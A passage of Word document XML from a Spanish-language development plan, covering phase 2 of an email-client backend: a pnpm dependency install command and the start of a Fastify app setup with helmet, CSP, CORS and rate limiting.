        <w:t xml:space="preserve">11.2 Fase 2: Backend Core (Semanas 2-3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">API REST funcional con autenticación, modelos de datos y servicios de correo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Entregables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Endpoints de auth, schemas Mongoose, IMAP bridge y SMTP service.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="180" w:name="fastify-setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2.1 Fastify Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/api</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add fastify@^5 @fastify/cors@^10 @fastify/jwt@^9 @fastify/cookie@^11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  @fastify/helmet@^13 @fastify/rate-limit@^10 @fastify/env@^5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  mongoose@^8 imapflow@^1 nodemailer@^6 bullmq@^5 ioredis@^5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  @aws-sdk/client-s3@^3 postal-mime@^2 sanitize-html@^2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  dotenv@^16 zod@^3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> typescript @types/node @types/nodemailer tsx vitest @vitest/coverage-v8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/app.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fastify </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'fastify'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cors </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@fastify/cors'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> jwt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@fastify/jwt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@fastify/cookie'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> helmet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@fastify/helmet'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> rateLimit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@fastify/rate-limit'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { envSchema } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./config/env.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { healthRoutes } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./routes/health.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { authRoutes } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./routes/auth.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { emailRoutes } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./routes/email.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { folderRoutes } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./routes/folder.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { attachmentRoutes } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./routes/attachment.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { composeRoutes } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./routes/compose.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { contactRoutes } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./routes/contact.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { calendarRoutes } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./routes/calendar.js'</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buildApp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>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Fastify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    logger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { level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LOG_LEVEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'info'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    trustProxy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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(helmet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    contentSecurityPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      directives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        defaultSrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"'self'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        scriptSrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"'self'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"'unsafe-inline'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        styleSrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"'self'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"'unsafe-inline'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        imgSrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"'self'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"data:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"blob:"</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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    origin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FRONTEND_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'http://localhost:5173'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    credentials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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(rateLimit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
